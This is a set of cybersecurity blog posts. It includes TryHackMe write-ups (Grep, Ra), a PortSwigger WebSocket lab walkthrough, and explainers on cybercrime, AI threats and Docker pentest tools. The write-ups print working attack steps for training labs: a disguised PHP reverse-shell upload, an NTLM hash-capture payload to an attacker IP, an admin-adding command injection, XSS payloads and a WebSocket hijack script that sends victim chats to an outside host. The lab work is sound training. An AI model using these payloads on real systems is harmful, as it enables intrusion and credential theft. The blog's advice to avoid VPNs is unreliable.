CyberiumX - CyberiumX

Cybercrime: Dark Web of Digital Attacks

Introduction

Technology has provided unparalleled ease and connectivity to our digital age, but it has also given rise to a worrying phenomenon: cybercrimes. These are illegal operations carried out online that have as their targets people, businesses, and even governments. In this blog, we’ll go into the world of cybercrimes and examine their types, effects, countermeasures, and roles in law enforcement.

What is Cybercrime?

In today’s world, cybercrime has become one of the major problems that people all over the world face. So, what exactly is cybercrime? Cybercrime is a crime that is committed with the use of a networked device, or a computer, for any purpose. Those who commit cybercrimes are known as cybercriminals.

A cybercriminal may use your device to get your personal info, your business info, government info, or even take your device offline. A cybercriminal can also sell or acquire the information listed above online. It is happening all around the world on a daily basis. Cybercriminals are the people who are good at hacking and taking advantage of technology. They usually do their best work in places where there’s a ton of digital data.

Top Common Types of Cybercrimes

Below are some of the most common cybercrimes around the world.

Impersonation/Identity Theft

Child Pornography

SIM Swap Scam

Website Defacement

Phishing

Malware and ransomware

Cyber Stalking

Data Breach

Cybersquatting

Cyber Bullying

Online Sextortion

Impersonation/Identity Theft

Identity Theft is a criminal activity in which an individual’s personal and confidential data is unlawfully accessed by cyber criminals. This data, which may include social security information, credit card information, and password information, is used for the purpose of obtaining financial gain, fraud, and other criminal activities. As digital transactions and digital presence have become increasingly prevalent, the potential for identity theft has increased significantly.

Criminals use a variety of methods to obtain personal information, including phishing, data breach, and cyber-attacks. Once this information is obtained, it can cause a wide range of damages to victims, from financial losses to psychological trauma. Many victims spend years recovering from the consequences, dealing with banks, credit bureaus, and law enforcement agencies.

Child pornography

Child pornography is a type of sexual exploitation of children. According to federal law, child pornography is any visual representation of sexual activity involving a minor (under the age of 18). Images of child pornography may also be referred to as images of child sexual abuse.

There are different types of child pornography, like images of a minor engaging in sexual activity, showing certain parts of their body for sexual purposes, encouraging a minor to engage in a sexual activity, or showing a minor engaging in a sexual activity that is illegal. These types of child pornography can be found in a variety of places, like photos, videos, writing, or audio recordings.

SIM swap scams

SIM swap scams are a type of fraud in which cybercriminals take advantage of weaknesses in a mobile phone’s operating system to access a victim’s personal data and accounts without authorization. What is SIM swap scam? In SIM swap scams, cybercriminals use social engineering and phishing attacks to gain access to the victim’s phone number and other personal information. Once they have this information, they pose as the victim and contact their mobile service provider to ask them to transfer their phone number into a new SIM that they own.

Website defacement

Website defacement is the act of maliciously altering the look and feel of a website. It is usually done as part of a hacktivism campaign or to demonstrate the attacker’s abilities. The attackers take advantage of weaknesses in the website’s security to access the original content and replace it with their own message, image, or even a political statement. When a website is defaced, it is often displaying messages that are either political, social or ideological in nature. It can also contain explicit content or even messages that promote the attacker’s own agenda.

The purpose of website defacement is to cause embarrassment to the website owner. It can also be used to spread a specific message or to cause chaos and disruption.

Phishing Attacks

Phishing is a type of malicious cyberattack that seeks to deceive individuals into providing personal information, including usernames and passwords, as well as credit card and personal identification information. Phishing attacks are typically conducted through deceptive emails, messages or websites that masquerade as legitimate entities in order to deceive recipients into believing they are communicating with a reliable source.

Cyberstalking

Cyberstalking is the practice of harassing, stalking, tracking, and intimidating people online through the use of digital communication tools and technologies. The purpose of cyberstalking is to harass, monitor, monitor, and threaten the victim, causing them emotional distress, and invading their privacy. The most common types of cyberstalkers are: Social media users Email users Instant messaging users Other online tools used by cyberstalkers Sending threatening messages Spreading false information Sharing personal data without consent Creating fake profiles to pretend to be the victim Monitoring their online presence

Data breach

A data breach is an unauthorized access, disclosure, or theft of confidential, personal, or sensitive information. It can occur as a result of a cyberattack, hacking incident, accidental disclosure, or due to internal negligence. A data breach can result in the loss of personal information, financial information, login information, or other sensitive data. It can also lead to identity theft, fraud, damage to reputation, and legal consequences. Data breaches can be sold online, used in phishing campaigns, or used in a variety of other ways by criminals.

Cybersquatting

Cybersquatting involves the registration of domain names that mimic well-known trademarks, brand names, or popular domain names with the intention to capitalize on the confusion or tarnish the original owner’s reputation. These domains can be used for advertising, impersonating legitimate brands, charging exorbitant fees for release, or redirecting web traffic to gain a competitive edge. Cyberquatting harms intellectual property, brand integrity, and consumer confusion. Fortunately, there are legal remedies available to trademark owners. These remedies include registering your trademark, keeping an eye on your domain, and taking legal action against cybersquatters as soon as possible to protect your brand and online presence.

Cyberbullying

Cyberbullying is a type of online harassment that uses digital communication tools to bully, degrade, or threaten people. It includes things like sending hurtful texts, spreading fake info, sharing private info without permission, and making fake profiles to mock the victim. It’s usually done on social media, messaging apps, or online forums. Cyberbullying can have a huge impact on people, causing them to feel anxious, depressed, and even suicidal. It’s especially worrying for young people because they rely so much on digital communication.

Online Sextortion

Sextortion is a form of cybercrime in which cybercriminals coerce victims into sharing intimate images, video, or personal data. The victim is then threatened with the exposure or distribution of the content if the victim does not comply with the blackmailer’s demands. This threat is typically accompanied by extortion demands for money, presents, or explicit content. Cybercriminals often pose as a trustworthy individual in order to gain the victim’s trust and enforce their demands.

Malware and Ransomware

Malware is a type of malicious software that’s designed to hurt, take advantage of, or get into your computer system or network. It’s made up of all kinds of malicious software, from viruses and worms to trojans and spyware. One of the most dangerous types of malware is ransomware, which encrypts your files or locks you out of your system. You have to pay a ransom in cryptocurrency to get your files back or unlock your system. This kind of ransomware can cause a lot of damage to your data, money, and your business.

Impact of Cybercrimes

Cybercriminals are increasingly targeting individuals in the modern digital world. As cyberattacks become more sophisticated, individuals are increasingly exposed to financial losses, identity fraud, psychological distress, and reputational damage.

Financial Losses: Cybercrime can cause significant financial losses for both individuals and organizations. Hackers may acquire confidential financial data, engage in fraudulent activities, or request ransom payments through ransomware attacks. Such incidents can result in direct financial losses and recovery expenses.

Data Breaches: Cybercrimes that involve the theft of personal information or confidential data can have serious repercussions. Personal data breaches can cause identity theft, money laundering, and unauthorized account access. For businesses, data breaches may involve the loss of valuable information, legal obligations, and damage to reputation.

National Security Concerns: Cyberattacks can grow into national security threats. Government agencies, military facilities and critical infrastructure can be targeted by state-sponsored cyberattacks or massive cyber espionage that threatens a nation’s security and stability.

Loss of Intellectual Property: The primary objective of cyberattacks on businesses is the theft of intellectual property, including trade secrets and product designs, as well as research data. Intellectual property theft can cause considerable economic losses and impede innovation.

Emotional and Psychological Impact: Emotional and psychological distress can be experienced by individuals who are victims of cybercrimes such as online bullying, harassment, and cyberstalking. The anonymity afforded by the internet can encourage cybercriminals to perpetrate their crimes and increase the amount of damage they cause.

Global Impact: Cybercrimes have no geographical boundaries and can be perpetrated from any location in the world, with perpetrators targeting victims in multiple countries. As a result, the global nature of cybercrime makes it difficult to effectively enforce legislation and pursue perpetrators.

Reputational damage: Last but not least, cybercrime can damage a person’s reputations. Cybercriminals use stolen information to publish embarrassing or damaging content on the internet. This can lead to a loss of trust and credibility in the eyes of the public. Reputational damage is especially severe in professional settings and can result in job loss or difficulty in finding employment.

Cybercrime is a growing concern for governments, businesses and individuals alike. Governments, businesses and individuals are increasingly investing in cyber security strategies, awareness campaigns and international partnerships to fight cybercrime. However, as technology continues to evolve, so does the way cybercriminals find ways to take advantage of vulnerabilities. This highlights the constant need to be vigilant and adapt to the ever-changing digital environment.

Prevention and Mitigation Strategies

Cyber security risks are becoming increasingly complex and widespread. The prevention and mitigation of cybercrime is of paramount importance in safeguarding individuals, companies, and society from its adverse effects. There are a variety of steps that individuals, companies, or governments can take to reduce and prevent the effects of cybercrime, including:

Strong Passwords: Using complex passwords and updating them regularly can thwart unauthorized access.

Two-Factor Authentication: Adding an extra layer of security, two-factor authentication requires a second form of verification beyond just a password.

Keeping Software Updated: Regularly updating software and applications helps to patch known vulnerabilities.

Educating Users: Raising awareness about cyber threats and teaching safe online practices can empower individuals to protect themselves.

Public Wi-Fi: It is advisable not to connect your devices to public Wi-Fi networks and also avoid using Virtual Private Network (VPN) as it may pose serious threats to devices as well as your life.

Conclusion

Cybercrime is an increasingly pressing issue that threatens the security of individuals, companies, and society. With the advancement of technology, the frequency and severity of cybercrime incidents are likely to rise, resulting in costly and damaging losses.

To combat Cybercrime, it is essential to increase awareness and take proactive measures. Individuals should adopt cyber security best practices and consider investing in Cyber insurance. Companies should focus on cyber security and training to reduce the risk of Cybercrime. Governments should implement policies to hold perpetrators accountable and encourage cyber security best practices.

In conclusion, Cybercrime must be combated in a collective manner by all parties involved, from individuals to businesses to governments. Taking proactive steps can help to reduce the risks associated with Cybercrime and protect against its devastating effects.

You can also check out our other blogs here.

Stay Safe!!!

Team CyberiumX

TryHackMe- Grep

Hello folks,

This blog focuses on a recently added machine called “Grep” within “TryHackMe”. It has been classified as an easy-level challenge where we need to penetrate our way into a Linux machine. Let’s proceed without any delay and begin the penetration testing process.

You can access the Grep machine on TryHackMe by clicking here.

First of all let’s start the machine by clicking on “Start Machine”.

Scan the obtained IP using the tool “NMAP”.

nmap <Machine_IP>

Okay, so we have three open ports: 22 (SSH), 80 (HTTP) and 443 (HTTPS). If we try to open the web pages on 80 and 443 ports, we will not get anything special.

Let’s perform Aggressive scan using NMAP with the help of following command:

nmap -A <Machine_IP>

In the response of NMAP scan, we can see that there is a domain name configured for the website which is “grep.thm”. So, we need to edit our /etc/hosts file so that we can access the website running on our target machine using the domain name as shown below:

Now if we try to open the web pages on 80 and 443 ports, we will see that the HTTPS website is showing a valid webpage which is under development. But HTTP is still showing the default page for Apache2.

There is a login page and a registration page. Let us explore the registration page and try to create a user account so we provided Username, Password, Email and Name and then clicked on Register. It gave us an error saying “Invalid or Expired API key”.

I used Burp Suite and proxy all the traffic through it. There is a request header called “X-THM-API-Key” which has a value which is our invalid API.

Finding API Key on Grep

I searched everything on the website but couldn’t get another API. Then I read the description of the room again and remembered that we need to perform OSINT as well in the CTF in order to solve it.

So, it can be possible to look for the API key online for this room. I searched on google and got nothing interesting except SearchMe is a CMS. Then I thought we should search on GitHub for the same. I searched for SearchMeCMS and got one very interesting GitHub repository by supersecuredeveloper. You can check it out here.

So we searched the repository but again got nothing in the code. But, wait it’s GitHub, so if the developer has made some changes in the webpage, we can check out the commits for it which might provide us the correct API.

There are 4 commits out of which one says “Fix: remove key” so let us click on it. And yes we got our API key.

Finding First Flag on Grep

Let us copy it, go to Burp suite and replace the previous API key with the new one we just found. Let us send the request with the same details as previous and you will find that the registration is successful.

After successfully registering ourselves on the website, let us go to the login page and try to login as our user “CyberiumX” and the password. We will see that we are logged in. Also, we got our First Flag as well.

Getting Foothold on Grep

Now, if we go back to the other commits, we will find that there is an upload page as well which we can open after visiting https://grep.thm/public/html/upload.php.

Also we can see which file types are allowed and which file type validation it is using to identify malicious files. The file validation type is Magic bytes which we can simply bypass by changing the file header value using a tool called Hexeditor.

Let us find a reverse shell written in PHP language. We can use the PHP reverse shell of Pentestmonkey which we can find either online or in our own machine at “/usr/share/webshells/php/php-reverse-shell.php”. Now we need to change the starting bits of the file with “ffd8ffe0” written in Hex.

In order to do it, edit the php file and add any 4 characters in the beginning of the file and change the value of the IP variable to your tun0 interface’s IP address.

Now open the file using hexeditor tool and change the file header to jpeg (ffd8ffe0) using the following command:

hexeditor php-reverse-shell.php

After making the changes we can confirm that our file type is a jpeg image using the following command:

file php-reverse-shell.php

Now let us upload the file on the web server using the upload functionality of the website. We will find that the malicious php file is uploaded successfully.

Now we need to find the uploads page where we can see the uploaded documents and execute the malicious php file to get the reverse shell. We can use gobuster for this. The command will be as follows:

gobuster dir -u https://grep.thm/api -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -k 2>/dev/null

We will find that there is a uploads page under api. The URL will be as follows:

https://grep.thm/api/uploads/

We will just click on the php-reverse-shell file to get the reverse connection from the target machine. Also, run netcat on our machine using the following command:

nc –nlvp 1234

As soon as we click on the file, we will get the reverse shell on our netcat

Finding Email of Admin on Grep

Great!!! We got our grip on Grep. Now I explored everything and finally got something interesting at /var/www/backup directory. There is a file named users.sql which contains the details of users. We can simply read the file using following command:

cat users.sql

We can see the password hash and email of admin user.

Finding another Domain on Grep

Also we need to find the another domain where we can get the information of leaked passwords, so for this we can simple check the /etc/hosts file and try to ready it using following command:

cat /etc/hosts

where we will find another domain.

Now we need to add this domain name as well in the hosts file of our machine and then try to visit the URL on http and https.

We will see that it is showing the Apache2 default page on http and forbidden on HTTPS.

After trying everything I thought there might be some other port available on the same machine. I scanned the IP with NMAP but it was taking a lot of time in scanning so I tried rustscan and within 10 seconds I got another open port on the machine which is 51337

Finding Admin’s Password on Grep

Finally on this port we got the access of our new subdomain where we can simply provide the email of admin to retrieve the password. We got the leaked password of an admin user which we can submit to solve the Grep machine.

Nice!!! This was an amazing and interesting box by TryHackMe. Please check out our other blogs on TryHackMe machines here.

Happy Pentesting!!!

Team CyberiumX

TryHackMe – Ra

Hello folks,

This blog focuses on a machine called “Ra” within “TryHackMe”. It has been classified as a hard-level challenge. I will be covering the whole WindCorp series of insane difficulty. Let’s proceed without any delay and begin the penetration testing process.

First of all let’s start the machine by clicking on “Start Machine”. Scan the obtained IP using the tool “NMAP”.

nmap -sS <Machine_IP>

Total 21 ports are open here so there are many ways to start the enumeration with. Also, due to some specific services like DNS, Kerberos and LDAP, we can say that the machine is a Domain Controller and it is an Active Directory environment. Let’s also perform a version and basic script scan.

nmap -sV -sC <Machine_IP>

There are some domain names mentioned “fire.windcorp.thm” and “windcorp.thm”. So I mentioned them in my /etc/hosts file. Let’s begin the process with port 80.

There is a “Reset Password” button in the top right corner which takes us to fire.windcorp.thm domain. It asks us the username and answer to any of the given security questions.

Finding First Flag on Ra

If you scroll down the windcorp.thm page you will find the name of some employees. These users might help us to get access.

If we hover our mouse on them we will get the usernames of those employees which might be useful to reset their password. We can also check out the source code for the usernames.

There are some images of employees and if you check one of them has a different set of names “lilyleAndSparky.jpg”.

Let’s go back to our reset password page and see if we can reset the password with the information we gathered. We can see that there is a security question which says “What is/was your favorite Pet name?” Let’s provide the details that we got from the name of the image.

Username- lilyle

Anwser- Sparky (Remember to write S in upper case)

Now let’s find some place to login with these credentials. We had SMB port open on the target DC so let’s try it there using the following command:

Smbclient \\\\windcorp.thm\\Shared -U lilyle

We got our first flag by connecting with the “Shared” share.

Finding Second Flag on Ra

There is another interesting deb file for “Spark”. Let’s download it and try to execute it. Now here on my machine I have some issues with installing the Spark. So, I tried to do the same on Attack Box using the following command:

dpkg -i spark_2_8_3.deb

After installation we can execute the application by simply running the ”spark” command.

Now let’s provide the credentials of lilyle users. Provide the domain name as windcorp.thm and select “Save Password” and “Login as invisible”.

Now if you try so it will give you a certificate verification error. So in order to login go to the “Advanced” option and check the following options.

“Accept all the certificates”

“Disable certificate hostname verification”

Now click OK and click on Login. We will see that we are now logged in as Lily Levesque users.

Before installing the spark2.8.3, we searched for the exploits related to this version and we found CVE-2020-12772 for which I found an exploit on GitHub.

We could send a user an img element with an external URL as the source of that image when we established a chat window with them, like this:

<img src=http://<attacker_IP>/test.img>

The attacker’s IP receives the request for the picture together with the NTLM hashes from the user who sees the link, i.e. the user you are talking with, each time the user clicks it or the ROAR module automatically preloads it.

We could run a responder to grab the hashes and use them to log into the user account.

Now we have to find a user who might be online so that we can send this malicious XSS payload to get the NTML hashes of that user. If we go back to the website and scroll down to the list of users, we will find that there is a single user whose avatar is showing active (Green Color). The user’s name is “Buse Candan”.

We will send a malicious XXS message to Buse and also run Responder so that we can simply try to capture the hashes. We can execute responder using the following command:

responder -I tun0

And then send the following payload:

<img src=http://<attacker_IP>/Cyberiumx.jpg>

Yeahh!!! We got the hash of the Buse user. Let’s copy the hash of the user and paste it to a new file. We can crack the hash using the following command:

john –wordlist=/usr/share/wordlists/rockyou.txt hash.txt

where, hash.txt is the file where we copied the hash.

Great!!! So now we have cracked the password hash of Buse user, we can simply use evil-winrm to get access of the machine using following command:

evil-winrm -u buse -p <password> -i windcorp.thm

We got our second flag (Flag 2.txt). Now after getting the foothold on the machine, we need to escalate our privileges so after trying many methods, the whoami /all command provided a Group name Account Operators whose member is our current user.

Finding Third Flag on Ra

Members of the Account Operators group have access to alter other accounts’ passwords by default. So this gives us an advantage that we can change the password for any other user which we find interesting. So, I further searched some folders/files which are there on the system and found a folder named scripts in C drive.

There are two files out of which one seems interesting. There is a PowerShell script named checkservers.ps1. We can read the file with the following command:

type checkservers.ps1

After reading the PowerShell script, I found a location “C:\Users\brittanycr\hosts.txt”. Whatever we will type in this file, it will be executed on the shell (Powershell) of target windows machine. So somehow we have to become brittanycr user.

We can achieve this by simply changing the password of this user as we are a part of the Account Operators group. We need to use the following command:

net user brittanycr CyberiumX_R00cks

where, “CyberiumX_R00cks” is the new password for the user.

Now, after this we tried to login with the help of evil-winrm tool but it didn’t work.

Let’s try to get the share access using smbclient tool using the following command:

smbclient //windcorp.thm/Users -U brittanycr

And yes!!! We got access to the share. Let’s run the following command:

cd brittanycr

and let us download hosts file using the following:

get hosts.txt

Okay so now we have to edit the file and add any command which might help us to become administrator. We can add the following line at the end of hosts.txt file which will add another user named CyberiumX with password as CyberiumX123 and also add the user to administrators group:

;net user CyberiumX CyberiumX123 /add;net localgroup Administrators CyberiumX /add

Let’s save the file and again login with smbclient and execute the following commands:

smbclient //windcorp.thm/Users -U brittanycr

cd brittanycr

put hosts.txt

This time we have uploaded the hosts.txt file.

Now after sometime we try to login as CyberiumX user using evil-winrm tool with the help of following command:

evil-winrm -u CyberiumX -p CyberiumX123 -i windcorp.thm

Wooohh!! We got access as CyberiumX users. Now we can simply go to the following location and get the Flag3.txt:

C:\Users\Administrator\Desktop

We have successfully hacked RA. So you must have learned a lot from this machine.

You guys can check out our other blogs on TryHackMe Machines here.

Happy Pentesting!!!

Team CyberiumX

PortSwigger- WebSocket Vulnerability

Hello folks,

This blog focuses on how we can identify and exploit WebSocket vulnerabilities on websites. We will be providing a detailed walkthrough of all PortSwigger’s Lab. Readers should have basic knowledge of WebSockets.

You can check out the Portswigger’s labs for WebSocket vulnerability here.

Let’s proceed without any delay and begin the penetration testing process.

Before starting the labs, let us understand what WebSockets are? A client (often a web browser) and a server can communicate in real-time and in both directions using the WebSockets protocol via a single, persistent connection. WebSockets allow both the client and the server to transmit messages to each other at any time without the need to establish a new connection for each message, in contrast to traditional HTTP requests, which are normally started by the client and handled by the server. This is a new technology and hence contains vulnerabilities. So, let us dive into the identification and exploitation of WebSocket related vulnerabilities.

Lab-1 Manipulating WebSocket messages to exploit vulnerabilities

By altering the contents of WebSocket messages, it is possible to discover and take advantage of the majority of input-based vulnerabilities affecting WebSockets. Let us find out how we can manipulate WebSocket messages.

Access the lab and open Burp Suite Community edition in order to identify WebSocket vulnerability.

On the home page, we will find a “Live chat” option. Let us click on it. It will take us to a chatting functionality where we will be having a live conversation with the support agent.

Let us enter anything to initiate the chat and proxy everything through Burp Suite.

Go to Burp suite and click on “WebSocket history” under Proxy tab. Here we will find all the WebSocket requests and responses that were exchanged between client and server. Let us search for a message request that we sent to the server and send that request to the repeater.

Let’s switch to the repeater tab and change the value of the message to a malicious JavaScript payload which should generate an alert() on the support agent’s browser who is communicating with us. Here is the payload to trigger alert():

<img src=x onerror=alert(“CyberiumX”)>

Send the request which will trigger this payload on the browser of the support agent.

So this is how we can manipulate the WebSocket messages to trigger XXS. This will solve the lab as well.

Lab-2 Manipulating the WebSocket handshake to exploit vulnerabilities

Only by interfering with the WebSocket handshake may some WebSocket vulnerabilities be discovered and taken advantage of. These vulnerabilities frequently entail design errors, such as improper reliance on HTTP headers like the X-Forwarded-For header to make security determinations. Let’s dive into and find how to perform it.

Access the lab and open Burp Suite Community edition in order to identify XXE vulnerability.

On the home page, we will find a “Live chat” option. Let us click on it. It will take us to a chatting functionality where we will be having a live conversation with the support agent.

Let us enter anything to initiate the chat and proxy everything through Burp Suite.

<img src=x onerror=alert(“CyberiumX”)>

Send the request. We will find that the attack has been detected due to an aggressive XXS filter implemented server side.

Also, we will find that the connection has been disconnected. So we need to reconnect with the server by clicking on the Reconnect option.

It will open another window where we can see our reconnect request as well as the response received from the server. Let us click on Response and will find that our IP address has been blacklisted or blocked which means we cannot reconnect with the server using our IP.

We have a header which might help us out here if it is supported by the server. The header is “X-Forwarded-For” which helps us to change our IP to whatever we will provide as a value to this header. So let’s add a header as follows:

X-Forwarded-For: 1

Click on Connect.

We will find that we are again connected with the server. Now we will again make some changes in the payload and try the same steps again if we are disconnected again.

Finally, after trying some XXS payloads, the following payload worked:

<iMG Src=x oNeRRor=alert`“CyberiumX”`>

So, this is how we can manipulate WebSocket handshakes to exploit XXS vulnerability. This will solve the lab as well.

Lab-3 Cross-site WebSocket hijacking

Cross-site request forgery (CSRF) vulnerability on a WebSocket handshake is what causes cross-site WebSocket hijacking, also referred to as cross-origin WebSocket hijacking. It occurs when the WebSocket handshake request does not contain any CSRF tokens or other unpredictable information and instead entirely depends on HTTP cookies to handle sessions. So let’s find out how we can exploit it.

Access the lab and open Burp Suite Professional in order to identify XXE vulnerability. Our webpage will open in a while.

On the home page, we will find a “Live chat” option. Let us click on it. It will take us to a chatting functionality where we will be having a live conversation with the support agent.

Let us enter anything to initiate the chat and proxy everything through Burp Suite.

Go to Burp suite and click on “HTTP history” under the Proxy tab. Search for a GET request to /chat endpoint and right click on the request and click on Copy URL.

Now open the exploit server and in the body section type the following code:

<script>

    var ws = new WebSocket(‘wss://websocket_url’);

    ws.onopen = function() {

        ws.send(“READY”);

    };

    ws.onmessage = function(event) {

        fetch(‘https://Burp_collaborator_url’, {method: ‘POST’, mode: ‘no-cors’, body: event.data});

    };

</script>

In place of websocket_url, paste the copied URL. Remember to remove https:// from the copied URL. Now, let us open Burp Collaborator, copy the subdomain of collaborator and paste the URL in place of Burp_collaborator_url.

Store the payload and click on “Deliver exploit to victim”.

Now, switch to Burp Collaborator window and click on “Poll now”. We will find some interaction with our collaborator subdomain. Let us check the HTTP requests by clicking on each HTTP request and then clicking on “Request to Collaborator”.

We will find a POST request and in the body of which we will find the chats of our victim in JSON format. Now let’s look for the chat where the support agent has provided the password for the victim user. We also got the username of Victim as “Carlos”.

Now copy the Password, go to the “My account” page and login as carlos with the help of the copied password. We will find that we are logged in successfully and the lab is also solved.

This is how we can identify and exploit WebSocket related vulnerabilities.

You can check out our other writeup blogs on PortSwigger’s labs here.

Happy Pentesting!!!

Team CyberiumX

AI-Driven Cyber threats and Defenses

Introduction

The fusion of Artificial Intelligence (AI) and Cyber Security resulted in a new era of cyber threats and defense mechanisms in the quickly changing digital landscape. AI-driven cyberattacks are getting more and more sophisticated, launching targeted and evasive attacks by utilizing the huge capabilities of machine learning algorithms. In order to prevent and adapt to these new attacks, Cyber Security experts are simultaneously utilizing AI to create improved defense techniques. This extensive blog covers the cutting-edge strategies used to defend our digital infrastructure against these threats and digs deeper into the intricacies of AI-driven cyber attacks.

AI’s Increase in Cyberattacks

The widespread use of AI technology has given cybercriminals a potent ally in their efforts to compromise security measures. The following essential elements, which are at the heart of AI-driven cyberattacks, fuel a variety of malicious strategies:

Automated phishing campaigns use data analysis to create personalised, persuasive emails that are tailored to specific consumers. As a result of these efforts’ utilisation of users’ private information and preferences, the possibility of successful infiltration has greatly increased.

Cybercriminals use hostile machine learning (ML) approaches to trick AI-based security systems. They can get beyond the safeguards and get unauthorized access to systems by quietly modifying inputs.

Zero-Day Exploits: AI algorithms are quick to spot weaknesses in software and systems that have not yet been discovered. Zero-day exploits have resulted from this, which are very sophisticated and challenging to find using standard security procedures.

Malware produced by AI is polymorphic, continually changing and adapting its code to elude detection by signature-based systems. It is difficult to recognize and defend against such dangers because of their dynamic nature.

The Risks of Cyberattacks Driven by AI

AI-driven cyber attacks are a serious threat to everyone, including governments, businesses, and individuals. Their effectiveness is influenced by the following elements:

Cyber attackers may execute campaigns at previously unheard-of speeds and on an enormous scale thanks to AI. This power overwhelms conventional security infrastructure, which makes detection and reaction more difficult.

AI-powered attacks have the capacity to learn from the results of their activities, which enables them to quickly adapt and evolve. They become more resistant to static defense mechanisms as a result.

Evasion Techniques: AI-driven attacks can avoid detection by imitating legal user behaviour and blending in with regular network traffic. They are more difficult to recognize and defeat because of their deceitful strategy.

Attackers can affect AI models by data poisoning, which involves providing them with inaccurate or malicious data. AI defenses can become ineffective as a result of this manipulation, which can result in erroneous decisions and actions.

Cyber Security defense Powered by AI

Cyber Security experts are looking to AI as a critical tool for bolstering defenses and improving incident response capabilities in the face of these changing threats. To use AI in Cyber Security defense, several strategies are being used:

Behavioural Analysis: AI-driven security systems continuously track and examine system activity, network traffic, and user behaviour. These systems can quickly identify possible risks by spotting deviations from known patterns, anomalies, or suspicious activity.

Threat Intelligence and Predictive Analysis: Artificial intelligence (AI) systems are essential for collecting and analyzing enormous amounts of threat intelligence data from multiple sources. This makes it possible for organizations to anticipate and actively counteract new hazards before they manifest.

Adaptive Security Measures: AI-driven defenses are capable of dynamically modifying security rules and parameters in response to changing threat landscapes. Defense mechanisms are kept effective against new threats thanks to this adaptability.

Using Natural Language Processing (NLP) to Spot Phishing: To detect phishing attempts, NLP algorithms powered by AI examine the content of emails and other communications. As a result, there is a lower chance that employees may experience such assaults.

The Cyber Security field is embracing collaborative AI technologies that make it easier for enterprises to share threat intelligence and analysis. This team effort improves overall defense capabilities and facilitates quicker reaction times.

Ethical Aspects of AI-Powered Cyber Security

Ethics are more important than ever as AI becomes a crucial component of Cyber Security. Due to the substantial data gathering and monitoring needed for AI-powered protection, privacy concerns are raised. To maintain ethical operations in the industry, the proper balance between strong security and protecting individual privacy must be struck.

Conclusion

The terrain of cyberwar has been permanently changed by the fusion of AI and Cyber Security. The challenges posed by AI-driven cyber attacks are always changing as they take advantage of AI’s speed, adaptability, and evasion strategies to get past defenses. But AI also gives security experts the ability to create more sophisticated and adaptable protection procedures, ushering in a new era of Cyber Security defense. We can all improve our digital resilience and protect the future of our linked planet by utilizing AI’s potential while upholding ethical standards. We can only keep ahead of the continuously changing threat landscape via constant innovation, cooperation, and an uncompromising dedication to security.

You can check out our other blogs here.

Stay Safe !!!

Team CyberiumX

Penetration Testing using Docker

Overview of Docker

An open-source program named Docker is used to build, distribute, and operate applications in containers, which are loosely segregated environments. Containers can communicate with one another through well-defined channels even while they are physically separated from one another. Containerized applications keep their security.

Docker, which is somewhat similar to virtual machines, enables apps to run on the same Linux kernel as the system they are installed on. The host computer is where applications are shipped, which improves performance and reduces application size.

Who Uses Docker?

System administrators and developers both use Docker to deploy and run distributed applications. It provides tools for easing DevOps by enabling developers to generate templates known as images that can be used to create portable virtual machines known as containers that include their apps and all of their dependencies. These portable virtual machines can be set up and used by system administrators in both development and production settings.

Architecture of Docker

Docker manages and creates Docker containers based on Linux containers using a client-server architecture and a remote API. Docker images are the components of Docker containers. The connection between containers and images is comparable to how objects and classes are connected in object-oriented programming.

Docker’s Client

Docker clients allow the users to interact with Docker. The dockerd daemon receives a command from the docker client and executes it. Docker commands uses the Docker API to perform this communication. The Docker client may interact with many docker daemons.

Docker Host

A complete environment for installing and running programs is provided by the Docker host. The Docker daemon, along with Images, Containers, Networks, and Storage, make up this system. As was indicated before, the daemon, which is in charge of all container-related tasks, accepts commands via the CLI or the REST API. To manage its services, it can also communicate with other daemons.

Docker’s Registry

The services known as Docker registries basically lets you store and download images. In other words, a Docker registry is a group of Docker repositories that each contain one or more Docker Images. A couple of the Public Registries’ components include Docker Hub and Docker Cloud. Another choice is private registries. The three most often used commands when working with registries are docker push, docker pull, and docker run.

Installation of Docker

Linux users can quickly install Docker by launching the terminal and typing the following command:

apt install docker.io

In addition, we can use the help command to get more information about all the choices that Docker offers.

docker –help

After your Docker container has been running for a while, you can execute or retrieve any image from it. We’ll now take a look at the docker-based penetration testing infrastructure used by pen testers.

Docker for Penetration Tester

Given that it creates an environment for penetration testers and makes installation and configuration simple, Docker is crucial for penetration testing. Using a Docker container, we can deploy essential penetration testing tools like:

Metasploit Framework

Sqlmap

Kali Linux

Parrot OS

Run Metasploit Framework as a Docker Container

We are all aware that the powerful open-source penetration testing program known as Metasploit Framework exists. Without having to install it on our computer, we may run the Metasploit Framework inside of a Docker container.

Use the following command to download the Metasploit docker image to our computer:

docker pull metasploitframework/metasploit-framework

To run the Metasploit Docker file, simply execute the following command:

docker run –rm -it -p 443:443 -v ${PWD}:/root/.msf4 metasploitframework/metasploit-framework

Metasploit is now prepared to exploit the flaws. We may use the same commands we used to use Metasploit on other systems.

Removing docker images

If we need to remove the installed docker images, we can use the following commands:

To list all the docker images which are installed on the machine:

docker images

Now in order to remove the image, we need image_id which we can get with the above command and then use the following:

docker rmi <image_id>

docker images

Similar to this, we can install other tools using the proper commands and then configure them for simpler use. The installation and configuration processes utilizing a docker container are relatively quick, enhancing the productivity of penetration testers.

Run SQLmap as a Docker Container

SQLmap is an important penetration testing tool used to test websites against different types of SQL injection vulnerabilities. It is an open source tool used to automate the process of identifying and exploiting SQL injection vulnerabilities. We can simply use Docker to run SQLmap using the following commands:

If we do not know the name of the image of any Docker container, we can simply use “search” command in order to find the name of image as follows:

docker search sqlmap

This will provide us the images related to sqlmap. We can install any image with the help of the image name using the following command:

docker pull googlesky/sqlmap

After successfully pulling the image from Docker, we can run the SQLmap using the following command:

docker run -it googlesky/sqlmap

So, we can simply run SQLmap and its different options with the help of above command and exploit SQL related vulnerabilities.

Run Kali Linux as a Docker Container

Kali Linux is the best and user friendly Operating System for Penetration testing based on Debian distribution of Linux. Its environment can be deployed as a Docker image on any operating system using the following command:

docker pull kalilinux/kali-rolling

After pulling the Kali Linux image, we can simply run the Kali environment using the following command:

docker run -it kalilinux/kali-rolling

Run Parrot OS as a Docker Container

Another powerful Operating System which security researchers or penetration testers uses is Parrot OS which is a Debian based Linux distribution. We can use the Parrot OS environment on any Operating system using docker command as follows:

docker pull parrotsec/security

After successfully installing/pulling the Parrot OS image, we can simply run it using the following command:

docker run -it parrotsec/security

There are other tools which you can run using Docker for better performance and simply remove them.

